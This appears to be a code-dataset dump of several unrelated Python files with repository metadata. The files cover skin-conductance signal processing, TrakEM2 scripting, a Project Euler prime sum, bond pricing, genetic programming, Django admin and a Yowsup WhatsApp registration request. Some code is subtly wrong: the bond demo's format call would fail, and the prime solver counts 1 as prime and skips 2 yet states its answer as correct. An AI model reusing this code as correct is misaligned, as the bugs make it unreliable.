"before taking the second derivative")
p.smooth3 = param.Window(default=(4, 150), #del_segs=True,
desc="Smoothing of the second deri"
"vative before finding 0-crossings.")
desc = "Threshold for scoring SCRs (p-p)"
p.threshold = param.Param(default=.005, desc=desc)
desc=("Threshold for splitting a SCR into two SCRs (in the second "
"derivative)")
p.split_threshold = param.Param(default=0, desc=desc)
def _create_varlist_(self):
e = self.experiment
varlist = [e.variables.get('time'),
e.variables.get('magnitude')]
return varlist
def _derive_segment_data_(self, segment, preview=False):
# collect processing parameters
source = segment._p_attr['source']
sm1 = self.compiled['smooth1']
sm2 = self.compiled['smooth2']
sm3 = self.compiled['smooth3']
split_threshold = self.compiled['split_threshold']
threshold = self.compiled['threshold']
t = source.t
## get skin conductance (f0)
f0 = source.data[:,0]
if sm1 != None:
f0 = np.convolve(f0, sm1, 'same')
# find the first derivative (discrete difference)
d1 = np.diff(f0)
if sm2 != None:
d1 = np.convolve(d1, sm2, 'same')
# find zero crossings of the first derivative
r_start = mlab.cross_from_below(d1, 0)
r_end = mlab.cross_from_above(d1, 0)
if r_end[0] < r_start[0]:
r_end = r_end[1:]
# remove SCRs in rejected TWs
if self.reject_has_segment(segment):
sr = float(segment.samplingrate)
i = self.reject_check(segment, r_start, sr=sr)
r_start = r_start[i]
r_end = r_end[i]
i = self.reject_check(segment, r_end, sr=sr)
# find the second derivative
d2 = np.diff(d1)
if sm3 != None:
d2 = np.convolve(d2, sm3, 'same')
if preview:
P.figure()
P.plot(t, f0)
nf = max(abs(f0))
d1p = d1[1000:-1000]
d2p = d2[1000:-1000]
tp = t[1000:-1000]
P.plot(tp, nf/2 + (d1p / max(abs(d1p))) * nf)
P.plot(tp, nf/2 + (d2p / max(abs(d2p))) * nf)
P.axhline(nf/2)
# collect SCRs with positive p-p values
SCRs = []
for start, end in zip(r_start, r_end):
# find intermediate separation points
sep = mlab.cross_from_below(d2[start:end], 0) + start + 1
# remove SCRs in rejected TWs
if self.reject_has_segment(segment):
i = self.reject_check(segment, sep, sr=sr, tstart=start/sr)
sep = sep[i]
# remove separations that do not reach threshold
if split_threshold:
sep = list(sep)
idxs = [start] + sep + [end]
for i in xrange(len(idxs) - 2, 0, -1):
i0 = idxs[i]
i1 = idxs[i+1]
if np.max(d2[i0:i1]) < split_threshold:
sep.pop(i-1)
i = start
for j in np.hstack((sep, [end])):
pp = np.sum(d1[i:j])
if pp > threshold:
SCRs.append([t[i], pp])
i = j
if preview: # provide preview data to the viewer
raise NotImplementedError
else:
return np.array(SCRs)
|
UTF-8
|
Python
| false | false | 2,013 |
18,382,460,027,526 |
8acc2c5256db16e189b039909a37a6187f409d68
|
d4062c88e8c6891352c65e0d63975f0f8a77980f
|
/TrakEM2/generate_minimally_enclosing_envelopes.py
|
dd72e2f9f751e0087d47e30af8063b48bb848c7b
|
[] |
no_license
|
acardona/Fiji-TrakEM2-scripts
|
https://github.com/acardona/Fiji-TrakEM2-scripts
|
a602c8cba2839651d4763fe6fd7f0cd11711c396
|
29e809ea9b8bf9e94000d3e3e9e636421c64cfc5
|
refs/heads/master
| 2021-01-19T10:59:28.657123 | 2011-11-29T21:48:16 | 2011-11-29T21:48:16 | 786,563 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# To show the envelope of a single lineage, do:
# regex = "DPLm2" # the name of the lineage
# To create envelopes for all lineages, do:
# regex = None
# ... and then don't show the plots (all will be together):
# show_3D = False
# ASSUMES pipes have the same exact name across all TrakEM2 projects.
# The 'name' is the title of the pipe node in the Project Tree
# and any of its parent nodes, chained. So if you want all DPM lineages
# and these are grouped in a DPM lineage group, then use "DPM".
from ini.trakem2 import Project
from java.awt import Color
from java.io import File
projects = [p for p in Project.getProjects()]
# Add more colors if you have more than 6 projects open
colors = [Color.white, Color.yellow, Color.magenta, Color.green, Color.blue, Color.orange]
sources_color_table = {}
for project, color in zip(projects, colors):
sources_color_table[project] = color
# 1. The project to use as reference--others are compared to it.
reference_project = projects[0]
# 2. The regular expression to match. Only pipes whose name matches it
# will be analyzed. If null, all are matched.
regex = None # For a single one, put its name: "DPMm2"
# 3. A list of text strings containing regular expressions.
# Any pipe whose name matches any will be ignored.
ignore = ["unknown.*", "poorly.*", "MB.*", "peduncle.*", "TR.*"]
# 4. Whether to show the dialog to adjust parameters manually
show_dialog = True
# 5. Whether to generate the variability plots
generate_plots = True
# 6. Whether to show the generated plots in windows
show_plots = False # They will be stored in files.
# 7. The directory in which to save the plot .png files.
plots_dir = System.getProperty("user.home") + "/Desktop/variability-plots/"
# 8. Whether to show the 3D window
show_3D = True
# 9. Whether to show the average pipe in 3D
show_condensed_3D = True
# 10. Wether to show the original pipes in 3D
show_sources_3D = True
# 11. The table of Project instance vs color to use for that project
# sources_color_table # Already defined above
# 12. Whether to show the enclosing envelope
show_envelope_3D = True
# 13. The transparency of the envelope
envelope_alpha = 0.4
# 14. The resampling for the envelope
envelope_delta = 1
# 15. The type of envelope:
# 1 = 2 std Dev
# 2 = 3 std Dev
# 3 = average distance
# 4 = maximum distance
envelope_type = 3
# 16. Whether to show the axes in 3D
show_axes_3D = True
# 17. Whether to use a heat map for the envelope
use_heatmap = False
# 18. Store the condensed pipes in this table if not null
condensed = None
# 19. The list of projects to consider
# projects # Already defined above
# Ensure plots directory exists
if plots_dir:
f = File(plots_dir)
if not f.exists():
print "Created plots directory:", f.mkdirs()
Compare.variabilityAnalysis(reference_project,
regex,
ignore,
show_dialog,
generate_plots,
show_plots,
plots_dir,
show_3D,
show_condensed_3D,
show_sources_3D,
sources_color_table,
show_envelope_3D,
envelope_alpha,
envelope_delta,
envelope_type,
show_axes_3D,
use_heatmap,
condensed,
projects)
|
UTF-8
|
Python
| false | false | 2,011 |
6,150,393,170,340 |
6b26e3b680dc33a06b34290729b6b7be52b9009e
|
48a4b88b609d30657477bbd90811dfc1ae4a4942
|
/find_unicode.py
|
79b518f96de4dcdbfeb97d5221ceedd37eb3285f
|
[
"GPL-3.0-or-later"
] |
non_permissive
|
averagesecurityguy/artgen
|
https://github.com/averagesecurityguy/artgen
|
cf210751722ea8eb72b1fd02a8e836722d92a821
|
264b541d78b8fe81598687167205a6551ec051a1
|
refs/heads/master
| 2016-09-15T19:11:20.527439 | 2014-04-12T22:49:51 | 2014-04-12T22:49:51 | 9,070,179 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
text = ''
count = 1
for line in open('source_text.txt'):
line = line.strip()
char = 0
for c in line:
char += 1
try:
text += c.encode('ascii')
except:
print count, char
count += 1
|
UTF-8
|
Python
| false | false | 2,014 |
13,297,218,770,333 |
a485d5f86324aec565d58daa7c6be6e80a931d87
|
28954beb66c6bf7ee33f02e1a91b370082716013
|
/env/lib/python2.6/sre_constants.py
|
84580d6703e765014228cc56f0ea996d19f617b3
|
[] |
no_license
|
henyouqian/dms
|
https://github.com/henyouqian/dms
|
64e34517b3901b9eb5ae414d59598f4381c44bf8
|
cb61d4df3de17affadb977d4bdec7a8f8ba5d113
|
refs/heads/master
| 2016-09-05T16:53:13.012257 | 2012-07-07T19:03:12 | 2012-07-07T19:03:12 | 2,625,259 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
/opt/lib/python2.6/sre_constants.py
|
UTF-8
|
Python
| false | false | 2,012 |
2,817,498,574,163 |
828b5fab4a242af7dcdb8b6d437f0cd41b79e01f
|
939afaa60a0c991a92de52256fe633a3f83cd39c
|
/prob10.py
|
4e4982f54a60a18918ab5463f7b010366b9980e5
|
[] |
no_license
|
Jelloeater/ProjectEuler
|
https://github.com/Jelloeater/ProjectEuler
|
e600e3d3f135b9706a2726ff7a7383760672edad
|
e119771d8762dff4c51aa5e7ee2a61f6c27f38d8
|
refs/heads/master
| 2020-06-05T08:48:26.217586 | 2014-06-09T23:29:53 | 2014-06-09T23:29:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'Jesse'
# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.
#
# Find the sum of all the primes below two million.
# 142913828921
import math
def prime(x):
if x % 2 == 1: # Odd Number
for numToCheck in range(2, int(math.sqrt(x))+1): # Tests to square root rounded up
if x % numToCheck == 0:
return False
return True
def generateList(limit):
primeList = []
num = 1
while num < limit:
if prime(num):
primeList.append(num)
print(str(len(primeList)) + " - " + str(num))
num += 1
return primeList
numberList = generateList(2000000)
x = 0
for i in numberList:
x = i + x
print("Answer")
print(x)
|
UTF-8
|
Python
| false | false | 2,014 |
4,896,262,730,910 |
c985206ad5f364222306fe5aaac01b293ddca9d4
|
01766a6c51b6be326b6186e2e160269ea2ae6ea7
|
/FixedIncome/bond.py
|
1947b95dd919ec8c56c9e675133787b51df396d6
|
[] |
no_license
|
dhalik/fpl
|
https://github.com/dhalik/fpl
|
371ec5032985acebbf9f9ba54910be6e9a915444
|
6bd48218605c6fdb874d7f3e14de11d5f06b80aa
|
refs/heads/master
| 2020-06-07T18:39:30.603401 | 2014-08-04T00:01:44 | 2014-08-04T00:01:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from __future__ import division
from numpy import linspace
class Bond:
"""Basic bond object"""
def __init__(self, faceValue, coupon, maturity):
"""
@param faceValue - The face value of the bond
@param coupon - The coupon rate on the bond
@param maturity - The number of years until maturity of the bond
"""
self.couponRate = coupon
self.faceValue = faceValue
self.coupon = self.couponRate*faceValue
self.maturity = maturity
def price(self, rate):
"""
Calculate the price of a bond using a given rate
@param rate - The market rate to price the bond.
@return - The price of a bond
"""
annuity = self.coupon / rate * (1 - 1 / ((1 + rate) ** self.maturity))
fv = self.faceValue / (1 + rate) ** self.maturity
return annuity + fv
def main():
bond = Bond(1000, 0.08, 10)
template = "For rate {}, price is {}"
for r in xrange(1, 13):
print template.format(rate=r/100, price=bond.price(r/100))
if __name__ == "__main__":
main()
|
UTF-8
|
Python
| false | false | 2,014 |
17,145,509,462,422 |
1d9ae66aa15146dc2df8ca8c50a2dafc4a44515d
|
c861188b109d0d16738dab566e0d3d18a721edb6
|
/gp/literal.py
|
ab42f8557f055088792e63884cacd26ef349a123
|
[
"WTFPL"
] |
permissive
|
satusuuronen/pythai
|
https://github.com/satusuuronen/pythai
|
8a7585ca6c864403e9851dbe97867c02b0270475
|
80be77118b7359fe15ffe6374feffd1e3afb464c
|
refs/heads/master
| 2021-01-20T23:27:19.459542 | 2013-01-31T08:15:27 | 2013-01-31T08:15:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
@project: Pythai - Artificial Intellegence Project with Python
@package: Genetic Programming
@author: Timo Ruokonen (timoruokonen)
"""
import random
class literal:
'''
Represents a literal in the code. Literals have a type and value.
Example literals: 1, 0.57, "Kalja"
'''
registered_literals = list()
@staticmethod
def register(new_literal):
'''
Static method for registering a new literal.
Parameters:
new_literal - Literals value and type.
'''
literal.registered_literals.append(new_literal)
print "Registered literal: " + str(new_literal)
@staticmethod
def generate(typeof):
'''
Static method for generating a literal instance with given type. The new literal
instance is selected randomly from the registered literals that have the given
type.
Parameters:
typeof - Type of the literal to be created.
'''
while(True):
lit = literal.registered_literals[random.randrange(len(literal.registered_literals))]
#print "Comparing: " + str(type(lit)) + " to " + str(typeof)
if (type(lit) == typeof):
break
new_literal = literal()
new_literal.literal = lit
return new_literal
def to_s(self):
'''Returns the literal as string (code). '''
if (type(self.literal) == str):
return '"' + self.literal + '"'
else:
return str(self.literal)
|
UTF-8
|
Python
| false | false | 2,013 |
12,146,167,555,145 |
1a6e661da1031bae302159a6d9a55ee7dba2b7c6
|
cd96a078f3767b82a07aa5d64b58797e2eb79fa8
|
/pgweb/lists/admin.py
|
3027b3327afdf938d6a3ebbb37cdfae9cbaa0c7e
|
[
"BSD-3-Clause",
"PostgreSQL"
] |
permissive
|
df7cb/pgweb
|
https://github.com/df7cb/pgweb
|
ee5dca41f1e1152188b4a57531eb2fa25b4315eb
|
bf6e7a81c0a5f329ffd2f7b3e50c4c7c68735ffc
|
refs/heads/master
| 2021-10-11T05:09:31.518018 | 2014-03-28T18:18:42 | 2014-03-28T18:21:23 | 14,396,652 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.contrib import admin
from models import MailingList, MailingListGroup
admin.site.register(MailingListGroup)
admin.site.register(MailingList)
|
UTF-8
|
Python
| false | false | 2,014 |
11,862,699,708,324 |
41d84052b5b94e143d030e1a4f4a38074f0ccf1f
|
a71a99933155e4fb175830544185fd28c7e5e5ca
|
/Yowsup/Registration/v2/coderequest.py
|
d81419a9cf87b049122c07ed77d5279f5c4c9706
|
[
"WTFPL"
] |
permissive
|
widnyana/noisegate-bot
|
https://github.com/widnyana/noisegate-bot
|
7ca3eb9c929871927e45bd836c0cb9be7b64041a
|
6b24fcf552d8b6c4f72aec0042edce87a7dc6d69
|
refs/heads/master
| 2015-08-14T12:17:46.778786 | 2014-11-06T21:05:35 | 2014-11-06T21:05:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Copyright (c) <2012> Tarek Galal <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
from Yowsup.Common.Http.warequest import WARequest
from Yowsup.Common.Http.waresponseparser import JSONResponseParser
from Yowsup.Common.constants import Constants
from Yowsup.Common.utilities import Utilities
import os
class WACodeRequest(WARequest):
def __init__(self, cc, p_in, idx, method="sms"):
super(WACodeRequest, self).__init__()
self.p_in = p_in # number
self.addParam("cc", cc)
self.addParam("in", p_in)
self.addParam("lc", "US")
self.addParam("lg", "en")
self.addParam("mcc", "000")
self.addParam("mnc", "000")
self.addParam("method", method)
self.addParam("id", idx)
self.currentToken = Utilities.readToken()
if self.currentToken:
print("Read token from %s " %
os.path.expanduser(Constants.tokenStorage))
else:
self.currentToken = Constants.tokenData
self.addParam("token", self.getToken(p_in, self.currentToken["t"]))
self.url = "v.whatsapp.net/v2/code"
self.pvars = ["status", "reason", "length", "method", "retry_after", "code", "param"] +\
["login", "pw", "type", "expiration", "kind",
"price", "cost", "currency", "price_expiration"]
self.setParser(JSONResponseParser())
def send(self, parser=None):
res = super(WACodeRequest, self).send(parser)
# attempt recovery by fetching new token
if res:
if res["status"] == "fail":
if res["reason"] in ("old_version", "bad_token") and Utilities.tokenCacheEnabled:
print("Failed, reason: %s. Checking for a new token.." %
res["reason"])
res = WARequest.sendRequest(
Constants.tokenSource[0], 80, Constants.tokenSource[1], {}, {})
if res:
tokenData = res.read()
pvars = ["v", "r", "u", "t", "d"]
jParser = JSONResponseParser()
parsed = jParser.parse(tokenData.decode(), pvars)
if(
parsed["v"] != self.currentToken["v"]
or parsed["r"] != self.currentToken["r"]
or parsed["u"] != self.currentToken["u"]
or parsed["t"] != self.currentToken["t"]
or parsed["d"] != self.currentToken["d"]
):
self.currentToken = parsed
print("Fetched a new token, persisting !")
self.removeParam("token")
print("Now retrying the request..")
self.addParam(
"token", self.getToken(self.p_in, self.currentToken["t"]))
else:
print("No new tokens :(")
res = super(WACodeRequest, self).send(parser)
if res and res["status"] != "fail":
Utilities.persistToken(tokenData) # good token
return res
|
UTF-8
|
Python
| false | false | 2,014 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.